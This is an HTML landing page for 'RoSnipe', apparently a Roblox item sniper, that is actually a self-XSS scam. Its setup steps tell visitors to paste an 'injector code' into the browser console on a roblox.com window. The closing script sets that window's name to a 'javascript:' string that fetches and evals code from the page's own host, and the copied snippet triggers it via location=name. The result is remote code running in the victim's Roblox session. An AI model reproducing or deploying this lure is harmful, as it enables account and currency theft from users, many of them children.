<html lang="en">
<head>
<title>RoSnipe - Dashboard</title>
<link rel="stylesheet" href="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/css/purpose.css" id="stylesheet">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.2.0/css/all.css">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
</head>
<body class="bg-dark bg-noise" style="opacity: 1;">
<header class="header header-transparent" id="header-main">

<nav class="navbar navbar-main navbar-expand-lg navbar-transparent navbar-dark bg-dark" id="navbar-main">
<div class="container px-lg-0">

<a class="navbar-brand mr-lg-5" href="page.html">
<img alt="Image placeholder" src="logosnipe.png" id="navbar-logo" style="height: 50px;">
</a>

<button class="navbar-toggler pr-0 collapsed" type="button" data-toggle="collapse" data-target="#navbar-main-collapse" aria-controls="navbar-main-collapse" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>

<div class="navbar-collapse collapse" id="navbar-main-collapse" style="">
<ul class="navbar-nav align-items-lg-center">

<li class="nav-item active">
<a class="nav-link" href="page.html">Dashboard</a>
</li>
<li class="nav-item ">
<a class="nav-link" href="support.html">Support</a>
</li>
<li class="nav-item ">
<a class="nav-link" href="https://discord.gg/q4NsXB7">About</a>
</li>


</ul>
</div>
</div>
</nav>
</header>

<div class="main-content"><section class="slice slice-lg bg-gradient-primary" data-offset-top="#header-main" style="padding-top: 147.188px;">
<div class="container py-6 py-lg-0 d-flex align-items-center position-relative zindex-100">
<div class="col">
<div class="row">
<div class="col-xl-5 col-lg-6 align-self-center">
<div class="text-center text-lg-left pb-5">
<h2 class="h1 text-white mb-4">RoSnipe helps you <div id="typed-strings">
<p><em>Succeed.</em></p>
</div>
<span id="typed"></span></h2>
<p class="lead lh-180 text-white">The #1 free roblox item sniper.</p>
<div class="mt-5">
<a href="#sct_contact_form" class="btn btn-white rounded-pill hover-translate-y-n3 btn-icon mr-sm-4 scroll-me">
<span class="btn-inner--text">Start Earning</span>
<span class="btn-inner--icon"><i class="far fa-angle-right"></i></span>
</a>
</div>
</div>
</div>
<div class="col-lg-6 ml-lg-auto align-self-end">
<div class="position-relative" style="z-index: 10;">
<img alt="Image placeholder" src="https://rbxstorm.com/assets/img/stickmasterluke.png" class="img-fluid img-center" style="position: relative;">
</div>
</div>
</div>
</div>
</div>
</section>
<section class="slice slice-lg">
<div class="container">
<div class="mb-5 text-center">
<span class="badge badge-soft-success badge-pill badge-lg">
Our process
</span>
<h3 class=" mt-4">Snipe with confidence</h3>
<div class="fluid-paragraph mt-3">
<p class="lead lh-180">Sniping has never been easier. Rosnipe has all the right tools in order to make your profits sniping process a breeze.</p>
</div>
</div>
<div class="row">
<div class="col-lg-4">
 <div class="card hover-translate-y-n10 hover-shadow-lg p-2">
<div class="card-body">
<div class="">
<div class="pb-5">
<div class="icon bg-primary text-white rounded-circle icon-lg icon-shape shadow">
<i class="far fa-file-archive" style="padding-top: 18px;"></i>
</div>
</div>
<h5 class="font-weight-bold">Setup RoSnipe</h5>
<p class="mt-2 mb-0">Scroll down to follow the one-click installation for RoSnipe.</p>
</div>
</div>
</div>
</div>
<div class="col-lg-4">
<div class="card hover-translate-y-n10 hover-shadow-lg p-2">
<div class="card-body">
<div class="">
<div class="pb-5">
<div class="icon bg-primary text-white rounded-circle icon-lg icon-shape shadow">
<i class="far fa-clock" style="padding-top: 18px;"></i>
</div>
</div>
<h5 class="font-weight-bold">Leave running</h5>
<p class="mt-2 mb-0">Let Rosnipe handle the work! It may take 1-2 days to see results.</p>
</div>
</div>
</div>
</div>
<div class="col-lg-4">
<div class="card hover-translate-y-n10 hover-shadow-lg p-2">
<div class="card-body">
<div class="">
<div class="pb-5">
<div class="icon bg-primary text-white rounded-circle icon-lg icon-shape shadow">
<i class="far fa-dollar-sign" style="padding-top: 18px;"></i>
</div>
</div>
<h5 class="font-weight-bold">Enjoy Profits</h5>
<p class="mt-2 mb-0">Resell your purchased items and enjoy the profits!</p>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="slice slice-xl overflow-hidden bg-gradient-dark delimiter-top delimiter-bottom">

<div class="bg-absolute-cover bg-size--contain d-flex align-items-center">
<figure class="w-100">
<svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 1506.3 578.7" class="injected-svg svg-inject">
<path class="fill-purple" d="M 147.269 295.566 C 147.914 293.9 149.399 292.705 151.164 292.431 L 167.694 289.863 C 169.459 289.588 171.236 290.277 172.356 291.668 L 182.845 304.699 C 183.965 306.091 184.258 307.974 183.613 309.64 L 177.572 325.239 C 176.927 326.905 175.442 328.1 173.677 328.375 L 157.147 330.943 C 155.382 331.217 153.605 330.529 152.485 329.137 L 141.996 316.106 C 140.876 314.714 140.583 312.831 141.228 311.165 L 147.269 295.566 Z"></path>
<path class="fill-green" d="M 92.927 474.881 C 93.309 473.896 94.187 473.19 95.23 473.028 L 105.002 471.51 C 106.045 471.347 107.096 471.754 107.758 472.577 L 113.959 480.28 C 114.621 481.103 114.794 482.216 114.413 483.201 L 110.841 492.423 C 110.46 493.408 109.582 494.114 108.539 494.277 L 98.767 495.795 C 97.723 495.957 96.673 495.55 96.011 494.727 L 89.81 487.024 C 89.148 486.201 88.975 485.088 89.356 484.103 L 92.927 474.881 Z"></path>
<path class="fill-teal" d="M 34.176 36.897 C 34.821 35.231 36.306 34.036 38.071 33.762 L 54.601 31.194 C 56.366 30.919 58.143 31.608 59.263 32.999 L 69.752 46.03 C 70.872 47.422 71.165 49.305 70.52 50.971 L 64.479 66.57 C 63.834 68.236 62.349 69.431 60.584 69.706 L 44.054 72.274 C 42.289 72.548 40.512 71.86 39.392 70.468 L 28.903 57.437 C 27.783 56.045 27.49 54.162 28.135 52.496 L 34.176 36.897 Z"></path>
<path class="fill-blue" d="M 975.636 9.762 C 976.101 8.561 977.171 7.7 978.443 7.502 L 990.354 5.652 C 991.626 5.454 992.907 5.95 993.714 6.953 L 1001.272 16.343 C 1002.079 17.346 1002.29 18.703 1001.826 19.903 L 997.472 31.144 C 997.008 32.344 995.938 33.205 994.666 33.403 L 982.754 35.254 C 981.483 35.451 980.202 34.956 979.395 33.953 L 971.837 24.563 C 971.03 23.559 970.818 22.203 971.283 21.002 L 975.636 9.762 Z"></path>
<path class="fill-gray-dark" d="M 1417.759 409.863 C 1418.404 408.197 1419.889 407.002 1421.654 406.728 L 1438.184 404.16 C 1439.949 403.885 1441.726 404.574 1442.846 405.965 L 1453.335 418.996 C 1454.455 420.388 1454.748 422.271 1454.103 423.937 L 1448.062 439.536 C 1447.417 441.202 1445.932 442.397 1444.167 442.672 L 1427.637 445.24 C 1425.872 445.514 1424.095 444.826 1422.975 443.434 L 1412.486 430.403 C 1411.366 429.011 1411.073 427.128 1411.718 425.462 L 1417.759 409.863 Z"></path>
<path class="fill-orange" d="M 1313.903 202.809 C 1314.266 201.873 1315.1 201.201 1316.092 201.047 L 1325.381 199.604 C 1326.373 199.449 1327.372 199.837 1328.001 200.618 L 1333.895 207.941 C 1334.525 208.723 1334.689 209.782 1334.327 210.718 L 1330.932 219.484 C 1330.57 220.42 1329.735 221.092 1328.743 221.246 L 1319.454 222.689 C 1318.462 222.843 1317.464 222.457 1316.834 221.674 L 1310.94 214.351 C 1310.31 213.569 1310.146 212.511 1310.508 211.575 L 1313.903 202.809 Z"></path>
<path class="fill-red" d="M 1084.395 506.137 C 1084.908 504.812 1086.09 503.861 1087.494 503.643 L 1100.645 501.6 C 1102.049 501.381 1103.463 501.929 1104.354 503.036 L 1112.699 513.403 C 1113.59 514.51 1113.823 516.009 1113.31 517.334 L 1108.504 529.744 C 1107.99 531.07 1106.809 532.02 1105.405 532.239 L 1092.254 534.282 C 1090.85 534.5 1089.436 533.953 1088.545 532.845 L 1080.2 522.478 C 1079.309 521.371 1079.076 519.873 1079.589 518.547 L 1084.395 506.137 Z"></path>
</svg>
</figure>
</div>
<div class="container position-relative zindex-100">
<div class="text-center">
<h6 class="text-muted">- Our mission -</h6>
<div class="fluid-paragraph mt-4">
<p class="lead text-white lh-180">RoSnipe is an advanced Javascript-based limited sniper & auto-seller for Roblox. It is capable of scanning items up-to 10x faster than other competitors via WebSocket technology.
To do this, all you need to do is follow the setup instructions below and report any issues you find by contacting <a href="support.html">support</a></a>.
<br><br>Your license is valid until <b>February 17th, 2020 00:00 AM PST</b></p>
<a class="btn btn-primary rounded-pill btn-icon mt-5" href="#sct_contact_form">
<span class="btn-inner--icon"><i class="far fa-angle-right"></i></span>
<span class="btn-inner--text">Start Earning</span>
</a>
</div>
</div>
</div>
</section>
<section class="slice slice-lg" id="sct_contact_form">
<div class="container">
<div class="text-center"> <h3>Setup Instructions</h3>
<p>1. Copy the injector code to your clipboard by clicking <button type="button" onclick="copyPayload1()" class="btn btn-sm btn-secondary btn-icon rounded-pill">
<span class="btn-inner--icon"><i class="far fa-copy"></i></span>
<span class="btn-inner--text">Here</span>
</button></p>
<p>2. Click <button type="button" onclick="openRobloxWindow()" class="btn btn-sm btn-secondary btn-icon rounded-pill">
<span class="btn-inner--icon"><i class="far fa-download"></i></span>
<span class="btn-inner--text">Here</span>
</button> to launch the terminal window</p>
<p>3. Right click on the opened window and select <b>Inspect</b>, and then click on tab titled <b>Console</b> <br /><img src="https://i.imgur.com/b9B9eOa.png"><img src="https://i.imgur.com/03PSDb5.png"></p>
<p>4. Paste in the code and press enter, you should be instantly greeted by our logo.</p>
<img style="width: 75%;" src="https://i.imgur.com/wkQLoHJ.png">
<br>
<h3 style="padding-top: 60px;">Usage</h3>
<p>Just keep the terminal running in the background and you should start getting snipes within an hour or so.</p>
<p>We currently do not have a settings panel (soon TM), but everything is pre-configured to the best possible performance.</p>
<b>It is recommended that you have at-least 500 R$ in your account.</b>
<br /><br />
</div></div></section>
</div>
<div id="footers-footer-2">
<footer class="footer p-0 footer-dark bg-gradient-dark" id="footer-main">
<div class="container">
<div class="py-4">
<div class="row align-items-md-center">
<div class="col-md-4 mb-4 mb-md-0">
<div class="d-flex align-items-center">
<p class="text-sm mb-0">© RBXSniper 2020. All rights reserved.<br>We are not affiliated with any of the games or companies shown on this website. Use of any logos or trademarks are for reference purposes only. By utilizing the website, you agree to be bound by the terms of service.
</p>
</div>
</div>
<div class="col-sm-6 col-md-4 mb-4 mb-sm-0">
<ul class="nav justify-content-center">
<li class="nav-item">
<a class="nav-link" href="support.html">Terms</a>
</li>
<li class="nav-item">
<a class="nav-link" href="support.html">Support</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://discordapp.com/invite/q4NsXB7">About</a>
</li>
</ul>
</div>
<div class="col-sm-6 col-md-4">
<ul class="nav justify-content-center justify-content-md-end mt-3 mt-md-0">
<li class="nav-item">
<a class="nav-link" href="#">
<i class="fab fa-dribbble"></i>
</a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">
<i class="fab fa-instagram"></i>
</a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">
<i class="fab fa-github"></i>
</a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">
<i class="fab fa-facebook"></i>
</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</footer>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/js/materialize.min.js"></script>
<script src="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/js/purpose.js"></script>
<script src="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/js/purpose.core.js"></script>
<script src="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/js/demo.js"></script>
<script src="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/libs/swiper/dist/js/swiper.min.js"></script>
<script src="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/libs/typed.js/lib/typed.min.js"></script>
<script>
  var typed = new Typed('#typed', {
    stringsElement: '#typed-strings'
  });
  var typed = new Typed('.element', {
  strings: ['This is a JavaScript library', 'This is an ES6 module'],
  smartBackspace: true // Default value
});
</script>
<style type="text/css" data-typed-js-css="true">
        .typed-cursor{
          opacity: 1;
        }
        .typed-cursor.typed-cursor--blink{
          animation: typedjsBlink 0.7s infinite;
          -webkit-animation: typedjsBlink 0.7s infinite;
                  animation: typedjsBlink 0.7s infinite;
        }
        @keyframes typedjsBlink{
          50% { opacity: 0.0; }
        }
        @-webkit-keyframes typedjsBlink{
          0% { opacity: 1; }
          50% { opacity: 0.0; }
          100% { opacity: 1; }
        }
      </style>
<script>
    var url = 'https://www.roblox.com/robots.txt#/roliox-terminal/?whitelistKey=ab851a754c8c6424d4d31d8caf8206d6'
    var payload1 = 'startSniperProcess=>checkUpdates();(setThreads=>{location=name;125})()'
    var payload2 = 'fetch("//'+location.hostname+location.pathname+'?p").then(async x=>eval(await x.text()))'
    
    function openRobloxWindow() {
      var win = window.open(url, "javascript:"+payload2, 'height=350,width=750,location=no')
    }
    
    function copyPayload1() {
      var input = document.createElement('input')
      input.setAttribute('value', payload1)
      document.body.appendChild(input)
      input.select()
      var result = document.execCommand('copy')
      document.body.removeChild(input)
      
      alert("Copied!")
    }
  </script>
</body>
</html>